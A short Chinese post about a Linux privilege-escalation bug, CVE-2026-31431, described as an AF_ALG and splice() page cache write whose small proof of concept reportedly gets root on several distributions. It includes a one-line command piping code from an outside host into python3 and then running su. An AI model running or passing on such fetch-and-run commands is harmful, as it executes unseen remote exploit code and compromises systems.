早上看到一个漏洞，太猛了，直接提权，具体内容可以看 


curl https://copy.fail/exp | python3 && su

Xint 发现了 CVE-2026-31431，一个身份验证绕过的临时写入漏洞，通过 AF_ALG + splice() 实现 4 字节页面缓存写入。一个 732 字节的概念验证代码可在 Ubuntu、Amazon Linux、RHEL 和 SUSE 上获取 root 权限。 
我自己试了一下，ubuntu22.04 已更新所有补丁 
 [image]